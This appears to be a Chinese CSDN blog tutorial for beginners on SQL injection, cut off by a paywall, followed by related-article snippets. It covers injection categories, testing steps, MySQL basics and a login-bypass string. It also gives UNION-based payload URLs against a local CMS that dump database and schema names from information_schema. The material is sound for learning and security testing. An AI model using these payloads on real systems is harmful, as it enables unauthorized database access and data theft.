小白SQL注入基础入门(持续修改)

最新推荐文章于 2024-07-03 07:04:23 发布
最新推荐文章于 2024-07-03 07:04:23 发布
阅读量389 收藏 1
点赞数
文章标签: sql 数据库 mysql web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MSB_WLAQ/article/details/120727638
版权

1.SQL分类

基于变量数据类型分

数字型注入 字符型注入 '' ' ) ')

搜索型注入 %’

JSON型注入(判断是数字还是字符 考虑要不要闭合

JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"}

基于获取数据的方法

基于回显 基于错误 盲注 布尔型盲注 时间盲注

基于注入点位置分类(请求方法)

注入要判断是否有干扰

GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受)

HTTP头部(SERVER注入)

防护软件可能只针对某种提交方式进行防护 可以使用其他方式进行绕过

基于查询方式

2.SQL注入测试方法

1.寻找注入点(登录框,表单,http头部(cookie,ua,re),搜索或者查找。。)

2.判断注入点对符号有没有干扰

3.构造测试语句->1,判断注入类型(数字,字符)->2,闭合(--+ #)

4.通过order by判断列数

5.通过union select判断回显位置

6.构造语句,获取数据 database()

3.万能密码

1‘ or 1#

4.MYSQL基础知识

重要名称

information_schema 在php5.0以后支持的 information_schema.schemata 存放的是所有数据库名 information_schema.tables 存放的是所有表名 information_schema.columns 存放的是所有列名 table_schema 数据库名字 table_name 表名 column_name 列名 column_name 用来获取数据库的

SQL命令

1.查看当前数据库 show databases 2.创建数据库 create database wljy charset=gbk; 3.使用数据库 use wljy; 4.查看当前数据表 show tables; 5.创建数据表 default : 默认值 comment: 备注 表类型:int varchar(50) auto_increment自动增长 primary key create table test(id int primary key auto_increment,name varchar(50) not null,addr varchar(25) not null default '中国')engine=innodb charset=utf8; 6.查看表结构 desc(descripe) test show create table \G -- 将结果竖着排列 7.插入数据 insert into test(id,name,addr) values(1,'张三','福建'); insert into test values(null,'李四','东北'); insert into test(addr) values(''栋京'); // 报错 insert into test(name,addr) values('tom',default); 8.查看数据 select * from test where id=3; // 查id为3的所有信息 select name from test where id=3 // 查id为3的name信息 9.删除数据 delete from test where id=3; 10.删除表 drop table 表名 11.更新数据 update test set name='王五' where id=2;

1.使用mysqli函数,需要先开启对应的扩展

extension=php_mysqli.dll mysqli_connect(user,dbname); 2.设置字符编码 mysqli_set_charset(中文乱码写语句sql = "select * from 510_admin"; 5.执行sql语句,获取对象 con,获取对象数据rs] assoc 关联 row 索引 array 索引+关联

5.UNION注入

构造查询语句 1,暴库 cms http://127.0.0.1/cms/show.php?id=-32union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 --+ 2,暴所有数据库 concat()用来连接字符,group_concat将查询的结果在一行内展示 table_schema:用于条件判断。例如判断该数据库是否是cms 若出现Illegal mix of collations for operation 'UNION',通过convert(schema_name using latin1)修改编码即可。 http://127.0.0.1/cms/show.php?id=-32union select 1,2,group_concat(convert(schema_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.schemata --+ 3,暴所有表名 

最低0.47元/天 解锁文章
白面安全猿
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 829
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
小白学习的sql注入
weixin_45901002的博客
08-27 498
sql注入简介一、sql注入漏洞原理二、漏洞危害三、sql注入分类四、sql-labs靶场搭建 一、sql注入漏洞原理 针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的: 1、程序编写者在处理程序和数据库交互时, 使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 二、漏洞危害 但凡使用数据库开发的应用系统,就可能存在SQL注入攻击的
SQL注入基础 sql注入详细解释 小白学习笔记
qq_43355651的博客
09-07 1006
sql注入作为安全攻防中最重要的一个部分,可以说是所有渗透测试注入中最为重要的一个注入,不管是预防还是测试,都需要扎实的基础才能明白sql注入。 温馨提示:此文章仅限于学习记录与讨论,不得随意测试或者注入,互联网不是法外之地,任何除学习之外的事情与作者无关。 sql注入顾名思义就是执行sql命令 原理:执行的用户能使用sql注入绕过认证机制输入变量,使得sql语句发生变化,通过接收和传递重新定义sql语句,然后可以重新操作。 原理一定要弄清楚,以后才可以活学活用。 产生sql注入的条件:1..
SQL注入详解
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
最详细SQL注入教程
热门推荐
学习探讨博客
10-24 4万+
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。  SQL注入是从正常的WWW端口访
小白SQL注入基础入门详细解析
m0_55479420的博客
03-31 262
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 很多人学习python,不知道从何学起。 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。 很多已经做案例的人,却不知道如何去学习更加高深的知识。 那么针对这三类人,我给大家提供一个好的学习平台,免费
ssm事例入门小白启蒙
04-21
SSM(Spring、SpringMVC、MyBatis)是一个经典的Java...这个入门案例将帮助你建立起对SSM框架的初步理解,为进一步深入学习和实践打下坚实的基础。随着经验的积累,你将能够处理更复杂的业务场景,构建更大规模的应用。
web测试用例,适合小白入门看懂.
05-20
- 特殊字符:测试各种特殊字符输入,如SQL注入攻击(' or 1<>'1等)。 - 正确性:确保输入符合预期,例如电话号码、邮箱、URL等格式的校验。 3. 多文本框(type=textarea)测试: - 空格和换行:根据需求确认...
DVWA.zip(新手入门练习)
06-03
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
新闻频道web系统,小白入门
04-22
在后端,使用Java与MySQL数据库进行交互,通过PreparedStatement防止SQL注入,实现评论的插入、查询。前端使用AJAX异步提交评论,提高用户体验。 4. **管理员后台管理** 管理员后台通常包括对评论的删除和其他系统...
java web 开发的简易商城系统适用于小白入门
07-30
在商城系统中,我们需要通过JDBC来连接数据库,执行SQL语句,实现数据的增删改查操作。 4. **EJB或Spring框架**: - 对于更复杂的项目,可能会使用Enterprise JavaBeans(EJB)或Spring框架来管理业务对象和服务。...
数据库注入学习笔记9---简单的数据库注入
qq_41759633的博客
08-08 394
Access注入 介绍: 微软的小型数据库 优势: 提高速度和编码量 缺陷: 数据过大性能下降 后缀名:*.mdb 调用分析: 连接分析… 先找注入注入原理: 查询注入语句 ’ and 1=1 and 1=2 or 1=1 or 1=2 and 1=23 判断数据库类型: and exeits (select * from msysobjects) > 0 判断access and ...
SQL注入详解(全网最全,万字长文)
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
SQL注入(一)——MySQL注入(1)小白入门
m0_52885531的博客
07-20 466
SQL注入(一)——MySQL注入(1) MySQL注入 信息收集 操作系统 数据库名 数据库用户 数据库版本 其他(网站路径等) 数据注入 同数据库**(以5.0版本为界限)** 低版本----->暴力查询或结合读取查询 高版本----->Information_schema有据查询 高权限注入 常规查询 跨库查询----->利用注入进行跨数据库查询 文件读写----->利用注入进行文件读取或写入 以上是我们需要在SQL注入中所需要做的,首先要收集各种信
初识SQL(新手入门
Hiuyisha的博客
06-14 2733
SQL初读关键字
SQL超级简单的基础入门
沛哥儿的专栏
11-03 1928
做项目三大件:开发语言、数据、业务。 数据主要涉及到存储,一般的情况下大家用的都是标准的RDS来进行存储比较多。 在和开发的同学聊的时候,发现很多同学对于数据库的操作不是很清楚。 有些同学一些基本的操作语句都不太会写,可能是用多了navicat的缘故吧。 在这里把基本的SQL操作语句拉出来,大家可以收藏下。 很简单的语句。下面以MySQL为例,其它的RDS基本上都差不多的。 1、数据库的基本操作 1、创建数据库 CREATE DATABASE database-name 2、备份 m..
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 8945
sql注入中的union联合查询,union select 1,2,3
LeetCode //SQL - 196. Delete Duplicate Emails
最新发布
Made in Code
07-03 922
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值